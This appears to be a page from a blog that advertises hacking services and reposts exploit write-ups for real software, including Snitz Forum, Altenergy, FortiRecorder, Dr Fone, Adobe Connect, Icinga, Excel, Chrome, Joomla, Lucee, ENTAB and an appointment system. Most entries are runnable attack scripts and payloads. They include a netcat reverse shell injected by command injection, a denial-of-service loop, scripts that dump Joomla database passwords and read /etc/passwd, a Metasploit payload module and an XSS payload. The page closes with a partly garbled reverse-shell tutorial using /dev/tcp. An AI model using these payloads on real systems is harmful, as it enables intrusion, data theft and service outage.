Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863117827

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: Snitz Forum v1.0 - Blind SQL Injection
# Date: 13/03/2023
# Exploit Author: Emiliano Febbi
# Vendor Homepage: https://forum.snitz.com/
# Software Link: https://sourceforge.net/projects/sf2k/files/
# Version: ALL VERSION
# Tested on: Windows 10 

[code]
._ _______.
*/ ///______I
) . /_(_)
/__/ *0day PoC*


http://www.site.com/forum/cal.asp?date=25/03/2023   <= SQLi ???

http://www.site.com/forum/log.asp?log_id=3456       <= Blind SQLi #!WORK!#

._________.
*/ ///______I
) . /_(_)
/__/*0day PoC End*
[/code]
HireHackking 
# Exploit Title:  Altenergy Power Control Software C1.2.5 - OS command injection 
# Google Dork: intitle:"Altenergy Power Control Software"
# Date: 15/3/2023
# Exploit Author: Ahmed Alroky
# Vendor Homepage: https://apsystems.com/
# Version: C1.2.5
# Tested on: Windows 10
# CVE : CVE-2023-28343


import requests
import argparse

def exploit(target,attacker,port):
    url = f'{target}/index.php/management/set_timezone'

    headers = {
        'Accept': 'application/json, text/javascript, */*; q=0.01',
        'X-Requested-With': 'XMLHttpRequest',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36',
        'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
        'Origin': f'{target}',
        'Referer': f'{target}/index.php/management/datetime',
        'Accept-Encoding': 'gzip, deflate',
        'Accept-Language': 'en-US,en;q=0.9',
        'Connection': 'close'
    }

    print(f"Sending  Request")
    data = {
        'timezone': f'`mknod /tmp/pipe p;/bin/sh 0</tmp/pipe | nc
{attacker} {port} 1>/tmp/pipe`'
    }

    response = requests.post(url, headers=headers, data=data)
    # print(response.text)
if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Parse target, attacker,
and port.',)

    parser.add_argument('--target','-t', type=str, help='The target IP
address or hostname. example : http://192.168.254')
    parser.add_argument('--attacker','-a', type=str, help='The attacker IP
address or hostname.')
    parser.add_argument('--port', '-p',type=int, help='Listening port')

    args = parser.parse_args()
    try:
        exploit(args.target,args.attacker,args.port)
    except:
        parser.print_help()
    print("Exploit done")
HireHackking 
# Exploit Title: FortiRecorder 6.4.3 - Denial of Service
# Google Dork: N/A
# Date: 13/03/2023
# Exploit Author: Mohammed Adel
# Vendor Homepage: https://www.fortinet.com/
# Software Link: https://www.fortinet.com/products/network-based-video-security/forticam-fortirecorder
# Version: 6.4.3 and below && 6.0.11 to 6.0.0
# Tested on: Kali Linux
# CVE : CVE-2022-41333
# Security Advisory: https://www.fortiguard.com/psirt/FG-IR-22-388
# Technical Analysis: https://medium.com/@0xpolar/cve-2022-41333-71eb289d60b5

import requests
import warnings
import sys
from urllib.parse import unquote
warnings.filterwarnings('ignore', message='Unverified HTTPS request')

def POST(target, req_type, payload):
    print("[+] Target      : "+target)
    print("[+] Request Type: POST")
    print("[+] Payload     : " +payload)
    post_url = target+"/module/admin.fe"
    post_headers = {"User-Agent": "CVE-2022-41333", "Content-Type": "application/x-www-form-urlencoded"}
    url_decoder = unquote(payload)
    full_payload = "fewReq="+url_decoder
    while True:
        r = requests.post(post_url, headers=post_headers, data=full_payload, verify=False)
        if "Failed: Access denied" in r.text:
            print("[+] Payload Sent.")
        else:
            print("[!] Something went wrong!")
            print(r.text)

def GET(target, req_type, payload):
    print("[+] Target      : "+target)
    print("[+] Request Type: GET")
    print("[+] Payload     : " +payload)
    while True:
      url = target+"/module/admin.fe?fewReq="+payload
      headers = {"User-Agent": "CVE-2022-41333", "Connection": "close"}
      r = requests.get(url, headers=headers, verify=False)
      if "Failed: Access denied" in r.text:
          print("[+] Payload Sent.")
      else:
          print("[!] Something went wrong!")
          print(r.text)


print("[+] Starting ..")
target = str((sys.argv[1])) # https://fortirecorder.fortidemo.com
req_type = str((sys.argv[2])) # POST or GET
payload = str((sys.argv[3])) # :B:JSsrJW16blB9dXp8ayJMZmxcfnJee3J2cTltem5efGt2cHEiLio5amx6bXF+cnoi


if "post" in req_type.lower():
    if "https" in target.lower() or "http" in target.lower():
        POST(target, req_type, payload)
    else:
        print("[!] Invalid Target. [Ex: https://fortirecorder.fortidemo.com]")
elif "get" in req_type.lower():
    if "https" in target.lower() or "http" in target.lower():
        GET(target, req_type, payload)
    else:
        print("[!] Invalid Target. [Ex: https://fortirecorder.fortidemo.com]")
else:
    print("[!] Invalid Request Type.")
HireHackking 
# Exploit Title: Wondershare Dr Fone 12.9.6 - Privilege Escalation
# Date: 14 March 2023
# Exploit Author: Thurein Soe
# Vendor Homepage: https://drfone.wondershare.com
# Software Link: https://mega.nz/file/ZFd1TZIR#e2WfCX_ryaH08C3VNGZH1yAIG6DU01p-M_rDooq529I
# Version: Dr Fone version 12.9.6
# Tested on: Window 10 (10.0.19045.2604)
# CVE : CVE-2023-27010



*Vulnerability description*:

Wondershare Dr Fone version 12.9.6 running services named "WsDrvInst" on
Windows have weak service permissions and are susceptible to local
privilege escalation vulnerability. Weak service permissions run with
system user permission, allowing a standard user/domain user to elevate to
administrator privilege upon successfully modifying the service or
replacing the affected executable. DriverInstall.exe gave modification
permission to any authenticated users in the windows operating system,
allowing standard users to modify the service and leading to Privilege
Escalation.


C:\Users\NyaMeeEain\Desktop>cacls "C:\Program Files
(x86)\Wondershare\drfone\Addins\Repair\DriverInstall.exe"
C:\Program Files (x86)\Wondershare\drfone\Addins\Repair\DriverInstall.exe

Everyone:(ID)F

NT AUTHORITY\SYSTEM:(ID)F

BUILTIN\Administrators:(ID)F

BUILTIN\Users:(ID)R

APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R

APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R
C:\Users\NyaMeeEain\Desktop>sc qc WsDrvInst
SERVICE_NAME: WsDrvInst
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files
(x86)\Wondershare\drfone\Addins\Repair\DriverInstall.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Wondershare Driver Install Service
        DEPENDENCIES       : RPCSS
        SERVICE_START_NAME : LocalSystem
HireHackking

Adobe Connect 11.4.5 - Local File Disclosure

HACKER · %s · %s

# Title: Adobe Connect 11.4.5 - Local File Disclosure # Author: h4shur # date:2021.01.16-2023.02.17 # CVE: CVE-2023-22232 # Vendor Homepage: https://www.adobe.com # Software Link: https://www.adobe.com/products/adobeconnect.html # Version: 11.4.5 and earlier, 12.1.5 and earlier # User interaction: None # Tested on: Windows 10 & Google Chrome, kali linux & firefox ### Summary: Adobe Connect versions 11.4.5 (and earlier), 12.1.5 (and earlier) are affected by an Improper Access Control vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to impact the integrity of a minor feature. Exploitation of this issue does not require user interaction. ### Description : There are many web applications in the world, each of which has vulnerabilities due to developer errors, and this is a problem for all of them, and even the best of them, like the "adobe connect" program, have vulnerabilities that occur every month. They are found and fixed by the team. * What is LFD bug? LFD bug stands for Local File Disclosure / Download, which generally allows the attacker to read and download files within the server, so it can be considered a very dangerous bug in the web world and programmers must be aware of it. Be careful and maintain security against this bug * Intruder access level with LFD bug The level of access using this bug can be even increased to the level of access to the website database in such a way that the hacker reads sensitive files inside the server that contain database entry information and enters the database and by extracting the information The admin will have a high level of access * Identify vulnerable sites To search for LFD bugs, you should check the site inputs. If there is no problem with receiving ./ characters, you can do the test to read the files inside the server if they are vulnerable. Enter it and see if it is read or not, or you can use files inside the server such as / etc / passwd / .. and step by step using ../ to return to the previous path to find the passwd file * And this time the "lfd" in "adobe connect" bug: To download and exploit files, you must type the file path in the "download-url" variable and the file name and extension in the "name" variable. You can download the file by writing the file path and file name and extension. When you have written the file path, file name and extension in the site address variables, a download page from Adobe Connect will open for you, with "Save to My Computer file name]" written in the download box and a file download link at the bottom of the download box, so you can download the file. * There are values inside the url that do not allow a file other than this file to be downloaded. * Values: sco_id and tickets But if these values are cleared, you will see that reloading is possible without any obstacles At another address, you can download multiple files as a zip file. We put the address of the files in front of the variable "ffn" and if we want to add the file, we add the variable "ffn" again and put the address of the file in front of it. The "download_type" variable is also used to specify the zip extension. ### POC : https://target.com/[folder]/download?download-url=[URL]&name=[file.type] https://target.com/[folder]/download?output=output&download_type=[Suffix]&ffn=[URL]&baseContentUrl=[base file folder] ### References: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22232 https://nvd.nist.gov/vuln/detail/CVE-2023-22232 https://helpx.adobe.com/security/products/connect/apsb23-05.html
HireHackking

Icinga Web 2.10 - Arbitrary File Disclosure

HACKER · %s · %s

#!/usr/bin/env python3 # Exploit Title: Icinga Web 2.10 - Arbitrary File Disclosure # Date: 2023-03-19 # Exploit Author: Jacob Ebben # Vendor Homepage: https://icinga.com/ # Software Link: https://github.com/Icinga/icingaweb2 # Version: <2.8.6, <2.9.6, <2.10 # Tested on: Icinga Web 2 Version 2.9.2 on Linux # CVE: CVE-2022-24716 # Based on: https://www.sonarsource.com/blog/path-traversal-vulnerabilities-in-icinga-web/ import argparse import requests from termcolor import colored def print_message(message, type): if type == 'SUCCESS': print('[' + colored('SUCCESS', 'green') + '] ' + message) elif type == 'INFO': print('[' + colored('INFO', 'blue') + '] ' + message) elif type == 'WARNING': print('[' + colored('WARNING', 'yellow') + '] ' + message) elif type == 'ALERT': print('[' + colored('ALERT', 'yellow') + '] ' + message) elif type == 'ERROR': print('[' + colored('ERROR', 'red') + '] ' + message) def get_normalized_url(url): if url[-1] != '/': url += '/' if url[0:7].lower() != 'http://' and url[0:8].lower() != 'https://': url = "http://" + url return url def get_proxy_protocol(url): if url[0:8].lower() == 'https://': return 'https' return 'http' parser = argparse.ArgumentParser(description='Arbitrary File Disclosure Vulnerability in Icinga Web <2.8.6, <2.9.6, <2.10') parser.add_argument('TARGET', type=str, help='Target Icinga location (Example: http://localhost:8080/icinga2/ or https://victim.xyz/icinga/)') parser.add_argument('FILE', type=str, help='Filename to gather from exploit (Example: "/etc/passwd" or "/etc/icingaweb2/config.ini")') parser.add_argument('-P','--proxy', type=str, help='HTTP proxy address (Example: http://127.0.0.1:8080/)') args = parser.parse_args() if args.proxy: proxy_url = get_normalized_url(args.proxy) proxy_protocol = get_proxy_protocol(proxy_url) proxies = { proxy_protocol: proxy_url } else: proxies = {} base_url = get_normalized_url(args.TARGET) exploit_url = base_url + "lib/icinga/icinga-php-thirdparty" + args.FILE request = requests.get(base_url, proxies=proxies) if request.status_code == 404: print_message("Could not connect to provided URL!", "ERROR") exit() request = requests.get(exploit_url, proxies=proxies) file_content = request.text print(file_content)
HireHackking
## Exploit Title: Microsoft Excel 365 MSO (Version 2302 Build 16.0.16130.20186) 64-bit - Remote Code Execution (RCE) ## Exploit Author: nu11secur1ty ## Date: 03.16.2023 ## Vendor: https://www.microsoft.com/en-us/microsoft-365/excel ## Software: https://www.microsoft.com/en-us/microsoft-365/excel ## Reference: https://www.invicti.com/learn/remote-code-execution-rce/ ## CVE ID: CVE-2023-23399 ## Description: The malicious user can exploit the victim's PC remotely. For example, when the score indicates that the Attack Vector is Local and User Interaction is Required, this could describe an exploit in which an attacker, through social engineering, convinces a victim to download and open a specially crafted file from a website which leads to a local attack on their computer. STATUS: HIGH Vulnerability [+]Exploit0: ``` Sub Check_your_salaries() CreateObject("Shell.Application").ShellExecute "microsoft-edge:https://attacker.com" End Sub ``` [+]Exploit1: ``` Sub cmd() Dim Program As String Dim TaskID As Double On Error Resume Next Program = "cmd.exe" TaskID = Shell(Program, 1) If Err <> 0 Then MsgBox "Can't start " & Program End If End Sub ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-23399) ## Proof and Exploit: [href](https://streamable.com/dnyfx0) ## Time spend: 03:00:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>
HireHackking
#Exploit Title: Google Chrome 109.0.5414.74 - Code Execution via missing lib file (Ubuntu) Product: Google Chrome Discovered by: Rafay Baloch and Muhammad Samak #Version: 109.0.5414.74 #Impact: Moderate #Company: Cyber Citadel #Website: https://www.cybercitadel.com #Tested-on : Ubuntu 22.04.1 *Description* Google chrome attempts to load the 'libssckbi.so' file from a user-writable location. PATH: /home/$username/.pki/nssdb/libnssckbi.so Since the Shared Library 'ibnssckbi.so' specified path is writeable. It is possible to achieve the Code Execution by placing the malicious file with the name `libnssckbi.so` in the specified path. *exploit* Following is the POC that could be used to reproduce the issue: echo "\n\t\t\tGoogle-Chrome Shared Library Code Execution..." echo "[*] Checking /.pki/nssdb PATH" if [ -d "/home/haalim/.pki/nssdb" ] then echo "[+] Directory Exists..." if [ -w "/home/haalim/.pki/nssdb" ] then echo "[+] Directory is writable..." echo "[+] Directory is writable..." echo "[+] Generating malicious File libnssckbi.so ..." echo "#define _GNU_SOURCE" > /home/haalim/.pki/nssdb/exploit.c echo "#include <unistd.h>" >> /home/haalim/.pki/nssdb/exploit.c echo "#include <stdio.h>" >> /home/haalim/.pki/nssdb/exploit.c echo "#include <stdlib.h>" >> /home/haalim/.pki/nssdb/exploit.c echo "void f() {" >> /home/haalim/.pki/nssdb/exploit.c echo 'printf("Code Executed............ TMGM :)\n");' >> /home/haalim/.pki/nssdb/exploit.c echo "}" >> /home/haalim/.pki/nssdb/exploit.c gcc -c -Wall -Werror -fpic /home/haalim/.pki/nssdb/exploit.c -o /home/haalim/.pki/nssdb/exploit.o gcc -shared -o /home/haalim/.pki/nssdb/libnssckbi.so -Wl,-init,f /home/haalim/.pki/nssdb/exploit.o fi fi Upon closing the browser windows, the application executes the malicious code *Impact* The attacker can use this behavior to bypass the application whitelisting rules. This behavior can also lead to DoS attacks. An attacker can trick a victim into supplying credentials by creating a fake prompt.
HireHackking

Joomla! v4.2.8 - Unauthenticated information disclosure

HACKER · %s · %s

#!/usr/bin/env ruby # Exploit ## Title: Joomla! v4.2.8 - Unauthenticated information disclosure ## Exploit author: noraj (Alexandre ZANNI) for ACCEIS (https://www.acceis.fr) ## Author website: https://pwn.by/noraj/ ## Exploit source: https://github.com/Acceis/exploit-CVE-2023-23752 ## Date: 2023-03-24 ## Vendor Homepage: https://www.joomla.org/ ## Software Link: https://downloads.joomla.org/cms/joomla4/4-2-7/Joomla_4-2-7-Stable-Full_Package.tar.gz?format=gz ## Version: 4.0.0 < 4.2.8 (it means from 4.0.0 up to 4.2.7) ## Tested on: Joomla! Version 4.2.7 ## CVE : CVE-2023-23752 ## References: ## - https://nsfocusglobal.com/joomla-unauthorized-access-vulnerability-cve-2023-23752-notice/ ## - https://developer.joomla.org/security-centre/894-20230201-core-improper-access-check-in-webservice-endpoints.html ## - https://attackerkb.com/topics/18qrh3PXIX/cve-2023-23752 ## - https://nvd.nist.gov/vuln/detail/CVE-2023-23752 ## - https://vulncheck.com/blog/joomla-for-rce ## - https://github.com/projectdiscovery/nuclei-templates/blob/main/cves/2023/CVE-2023-23752.yaml # standard library require 'json' # gems require 'httpx' require 'docopt' require 'paint' doc = <<~DOCOPT #{Paint['Joomla! < 4.2.8 - Unauthenticated information disclosure', :bold]} #{Paint['Usage:', :red]} #{__FILE__} <url> [options] #{__FILE__} -h | --help #{Paint['Parameters:', :red]} <url> Root URL (base path) including HTTP scheme, port and root folder #{Paint['Options:', :red]} --debug Display arguments --no-color Disable colorized output (NO_COLOR environment variable is respected too) -h, --help Show this screen #{Paint['Examples:', :red]} #{__FILE__} http://127.0.0.1:4242 #{__FILE__} https://example.org/subdir #{Paint['Project:', :red]} #{Paint['author', :underline]} (https://pwn.by/noraj / https://twitter.com/noraj_rawsec) #{Paint['company', :underline]} (https://www.acceis.fr / https://twitter.com/acceis) #{Paint['source', :underline]} (https://github.com/Acceis/exploit-CVE-2023-23752) DOCOPT def fetch_users(root_url, http) vuln_url = "#{root_url}/api/index.php/v1/users?public=true" http.get(vuln_url) end def parse_users(root_url, http) data_json = fetch_users(root_url, http) data = JSON.parse(data_json)['data'] users = [] data.each do |user| if user['type'] == 'users' id = user['attributes']['id'] name = user['attributes']['name'] username = user['attributes']['username'] email = user['attributes']['email'] groups = user['attributes']['group_names'] users << {id: id, name: name, username: username, email: email, groups: groups} end end users end def display_users(root_url, http) users = parse_users(root_url, http) puts Paint['Users', :red, :bold] users.each do |u| puts "[#{u[:id]}] #{u[:name]} (#{Paint[u[:username], :yellow]}) - #{u[:email]} - #{u[:groups]}" end end def fetch_config(root_url, http) vuln_url = "#{root_url}/api/index.php/v1/config/application?public=true" http.get(vuln_url) end def parse_config(root_url, http) data_json = fetch_config(root_url, http) data = JSON.parse(data_json)['data'] config = {} data.each do |entry| if entry['type'] == 'application' key = entry['attributes'].keys.first config[key] = entry['attributes'][key] end end config end def display_config(root_url, http) c = parse_config(root_url, http) puts Paint['Site info', :red, :bold] puts "Site name: #{c['sitename']}" puts "Editor: #{c['editor']}" puts "Captcha: #{c['captcha']}" puts "Access: #{c['access']}" puts "Debug status: #{c['debug']}" puts puts Paint['Database info', :red, :bold] puts "DB type: #{c['dbtype']}" puts "DB host: #{c['host']}" puts "DB user: #{Paint[c['user'], :yellow, :bold]}" puts "DB password: #{Paint[c['password'], :yellow, :bold]}" puts "DB name: #{c['db']}" puts "DB prefix: #{c['dbprefix']}" puts "DB encryption #{c['dbencryption']}" end begin args = Docopt.docopt(doc) Paint.mode = 0 if args['--no-color'] puts args if args['--debug'] http = HTTPX display_users(args['<url>'], http) puts display_config(args['<url>'], http) rescue Docopt::Exit => e puts e.message end
HireHackking

Lucee Scheduled Job v1.0 - Command Execution

HACKER · %s · %s

# Exploit Title: Lucee Scheduled Job v1.0 - Command Execution # Date: 3-23-2012 # Exploit Author: Alexander Philiotis # Vendor Homepage: https://www.lucee.org/ # Software Link: https://download.lucee.org/ # Version: All versions with scheduled jobs enabled # Tested on: Linux - Debian, Lubuntu & Windows 10 # Ref : https://www.synercomm.com/blog/scheduled-tasks-with-lucee-abusing-built-in-functionality-for-command-execution/ ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Retry include Msf::Exploit::FileDropper require 'base64' def initialize(info = {}) super( update_info( info, 'Name' => 'Lucee Authenticated Scheduled Job Code Execution', 'Description' => %q{ This module can be used to execute a payload on Lucee servers that have an exposed administrative web interface. It's possible for an administrator to create a scheduled job that queries a remote ColdFusion file, which is then downloaded and executed when accessed. The payload is uploaded as a cfm file when queried by the target server. When executed, the payload will run as the user specified during the Lucee installation. On Windows, this is a service account; on Linux, it is either the root user or lucee. }, 'Targets' => [ [ 'Windows Command', { 'Platform' => 'win', 'Arch' => ARCH_CMD, 'Type' => :windows_cmd } ], [ 'Unix Command', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :unix_cmd } ] ], 'Author' => 'Alexander Philiotis', # aphiliotis@synercomm.com 'License' => MSF_LICENSE, 'References' => [ # This abuses the functionality inherent to the Lucee platform and # thus is not related to any CVEs. # Lucee Docs ['URL', 'https://docs.lucee.org/'], # cfexecute & cfscript documentation ['URL', 'https://docs.lucee.org/reference/tags/execute.html'], ['URL', 'https://docs.lucee.org/reference/tags/script.html'], ], 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [ # /opt/lucee/server/lucee-server/context/logs/application.log # /opt/lucee/web/logs/exception.log IOC_IN_LOGS, ARTIFACTS_ON_DISK, # ColdFusion files located at the webroot of the Lucee server # C:/lucee/tomcat/webapps/ROOT/ by default on Windows # /opt/lucee/tomcat/webapps/ROOT/ by default on Linux ] }, 'Stance' => Msf::Exploit::Stance::Aggressive, 'DisclosureDate' => '2023-02-10' ) ) register_options( [ Opt::RPORT(8888), OptString.new('PASSWORD', [false, 'The password for the administrative interface']), OptString.new('TARGETURI', [true, 'The path to the admin interface.', '/lucee/admin/web.cfm']), OptInt.new('PAYLOAD_DEPLOY_TIMEOUT', [false, 'Time in seconds to wait for access to the payload', 20]), ] ) deregister_options('URIPATH') end def exploit payload_base = rand_text_alphanumeric(8..16) authenticate start_service({ 'Uri' => { 'Proc' => proc do |cli, req| print_status("Payload request received for #{req.uri} from #{cli.peerhost}") send_response(cli, cfm_stub) end, 'Path' => '/' + payload_base + '.cfm' } }) # # Create the scheduled job # create_job(payload_base) # # Execute the scheduled job and attempt to send a GET request to it. # execute_job(payload_base) print_good('Exploit completed.') # # Removes the scheduled job # print_status('Removing scheduled job ' + payload_base) cleanup_request = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path), 'vars_get' => { 'action' => 'services.schedule' }, 'vars_post' => { 'row_1' => '1', 'name_1' => payload_base.to_s, 'mainAction' => 'delete' } }) if cleanup_request && cleanup_request.code == 302 print_good('Scheduled job removed.') else print_bad('Failed to remove scheduled job.') end end def authenticate auth = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path), 'keep_cookies' => true, 'vars_post' => { 'login_passwordweb' => datastore['PASSWORD'], 'lang' => 'en', 'rememberMe' => 's', 'submit' => 'submit' } }) unless auth fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") end unless auth.code == 200 && auth.body.include?('nav_Security') fail_with(Failure::NoAccess, 'Unable to authenticate. Please double check your credentials and try again.') end print_good('Authenticated successfully') end def create_job(payload_base) create_job = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path), 'keep_cookies' => true, 'vars_get' => { 'action' => 'services.schedule', 'action2' => 'create' }, 'vars_post' => { 'name' => payload_base, 'url' => get_uri.to_s, 'interval' => '3600', 'start_day' => '01', 'start_month' => '02', 'start_year' => '2023', 'start_hour' => '00', 'start_minute' => '00', 'start_second' => '00', 'run' => 'create' } }) fail_with(Failure::Unreachable, 'Could not connect to the web service') if create_job.nil? fail_with(Failure::UnexpectedReply, 'Unable to create job') unless create_job.code == 302 print_good('Job ' + payload_base + ' created successfully') job_file_path = file_path = webroot fail_with(Failure::UnexpectedReply, 'Could not identify the web root') if job_file_path.blank? case target['Type'] when :unix_cmd file_path << '/' job_file_path = "#{job_file_path.gsub('/', '//')}//" when :windows_cmd file_path << '\\' job_file_path = "#{job_file_path.gsub('\\', '\\\\')}\\" end update_job = send_request_cgi({ 'method' => 'POST', 'uri' => target_uri.path, 'keep_cookies' => true, 'vars_get' => { 'action' => 'services.schedule', 'action2' => 'edit', 'task' => create_job.headers['location'].split('=')[-1] }, 'vars_post' => { 'name' => payload_base, 'url' => get_uri.to_s, 'port' => datastore['SRVPORT'], 'timeout' => '50', 'username' => '', 'password' => '', 'proxyserver' => '', 'proxyport' => '', 'proxyuser' => '', 'proxypassword' => '', 'publish' => 'true', 'file' => "#{job_file_path}#{payload_base}.cfm", 'start_day' => '01', 'start_month' => '02', 'start_year' => '2023', 'start_hour' => '00', 'start_minute' => '00', 'start_second' => '00', 'end_day' => '', 'end_month' => '', 'end_year' => '', 'end_hour' => '', 'end_minute' => '', 'end_second' => '', 'interval_hour' => '1', 'interval_minute' => '0', 'interval_second' => '0', 'run' => 'update' } }) fail_with(Failure::Unreachable, 'Could not connect to the web service') if update_job.nil? fail_with(Failure::UnexpectedReply, 'Unable to update job') unless update_job.code == 302 || update_job.code == 200 register_files_for_cleanup("#{file_path}#{payload_base}.cfm") print_good('Job ' + payload_base + ' updated successfully') end def execute_job(payload_base) print_status("Executing scheduled job: #{payload_base}") job_execution = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path), 'vars_get' => { 'action' => 'services.schedule' }, 'vars_post' => { 'row_1' => '1', 'name_1' => payload_base, 'mainAction' => 'execute' } }) fail_with(Failure::Unreachable, 'Could not connect to the web service') if job_execution.nil? fail_with(Failure::Unknown, 'Unable to execute job') unless job_execution.code == 302 || job_execution.code == 200 print_good('Job ' + payload_base + ' executed successfully') payload_response = nil retry_until_truthy(timeout: datastore['PAYLOAD_DEPLOY_TIMEOUT']) do print_status('Attempting to access payload...') payload_response = send_request_cgi( 'uri' => '/' + payload_base + '.cfm', 'method' => 'GET' ) payload_response.nil? || (payload_response && payload_response.code == 200 && payload_response.body.exclude?('Error')) || (payload_response.code == 500) end # Unix systems tend to return a 500 response code when executing a shell. Windows tends to return a nil response, hence the check for both. fail_with(Failure::Unknown, 'Unable to execute payload') unless payload_response.nil? || payload_response.code == 200 || payload_response.code == 500 if payload_response.nil? print_status('No response from ' + payload_base + '.cfm' + (session_created? ? '' : ' Check your listener!')) elsif payload_response.code == 200 print_good('Received 200 response from ' + payload_base + '.cfm') output = payload_response.body.strip if output.include?("\n") print_good('Output:') print_line(output) elsif output.present? print_good('Output: ' + output) end elsif payload_response.code == 500 print_status('Received 500 response from ' + payload_base + '.cfm' + (session_created? ? '' : ' Check your listener!')) end end def webroot res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path) }) return nil unless res res.get_html_document.at('[text()*="Webroot"]')&.next&.next&.text end def cfm_stub case target['Type'] when :windows_cmd <<~CFM.gsub(/^\s+/, '').tr("\n", '') <cfscript> cfexecute(name="cmd.exe", arguments="/c " & toString(binaryDecode("#{Base64.strict_encode64(payload.encoded)}", "base64")),timeout=5); </cfscript> CFM when :unix_cmd <<~CFM.gsub(/^\s+/, '').tr("\n", '') <cfscript> cfexecute(name="/bin/bash", arguments=["-c", toString(binaryDecode("#{Base64.strict_encode64(payload.encoded)}", "base64"))],timeout=5); </cfscript> CFM end end end
HireHackking

ENTAB ERP 1.0 - Username PII leak

HACKER · %s · %s

Exploit Title: ENTAB ERP 1.0 - Username PII leak Date: 17.05.2022 Exploit Author: Deb Prasad Banerjee Vendor Homepage: https://www.entab.in Version: Entab ERP 1.0 Tested on: Windows IIS CVE: CVE-2022-30076 Vulnerability Name: Broken Access control via Rate Limits Description: In the entab software in fapscampuscare.in, there is a login portal with a UserId field. An authenticated user would enter and get their name as well as other services. However, there should be a rate limit in place, which is not present. As a result, a hacker could bypass the system and obtain other usernames via broken access control. This enables a threat actor to obain the complete full name and user ID of the person. POC: 1. Go to fapscampuscare.in or any entab hosted software and find the entab software. 2. Use a proxy to intercept the request. 3. Since it's a student login, try a random UserId (e.g., s11111). 4. Intercept the request using Burp Suite and send it to the Intruder. 5. Select payloads from number 100000-20000, and turn off URL encoding on the UserId parameter. 6. Start the attack and sort by length to obtain the username and full name of other users.
HireHackking

Online Appointment System V1.0 - Cross-Site Scripting (XSS)

HACKER · %s · %s

# Exploit Title: Online Appointment System V1.0 - Cross-Site Scripting (XSS) # Date: 25/02/2023 # Exploit Author: Sanjay Singh # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/14502/online-appointment-system-php-full-source-code-2020.html # Tested on: Windows use payload="><script>alert(XSS)</script> 1. visit-http://localhost/doctor/applicationlayer/Doctorpatient.php 2. login Doctor account with default credential 3. Click left side add description 4. capture request and put payload http://localhost/doctor/presentaionlayer/doctor/add.php/wrycv%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E request GET /doctor/presentaionlayer/doctor/add.php/wrycv%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E HTTP/1.1 Host: localhost Cache-Control: max-age=0 sec-ch-ua: "Chromium";v="111", "Not(A:Brand";v="8" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=ocj11iinu8pn536i3cdia0faql Connection: close
HireHackking

Title: Various Ways to Be Shot Shell in Penetration Test

HACKER · %s · %s

In our penetration testing process, the most commonly used one is to rebound a shell based on the tcp/udp protocol, that is, reverse connection.
Let’s first talk about what forward and reverse connections are.
Forward connection: Our machine connects to the target machine, such as ssh and mstsc
Reverse connection: The target machine connects our machine
So why is reverse connection more commonly used
The target machine is in the LAN, and we are not able to connect to him
The target machine is a dynamic IP
The target machine has a firewall
Then let me talk about my experimental environment
Attack aircraft: Kali Linux: 47.98.229.211
Victimized machine: Centos 7: 149.129.68.117 (Ali Cloud Server)
Position 1
is also the most common way
Kali Monitor
nc -lvvp 4444centos run
-i /dev/tcp/47.98.229.211/5555 01 After executing the command, it successfully rebounded!
Position Two python
Attack aircraft Kali or monitor
nc -lvvp 5555centos execution
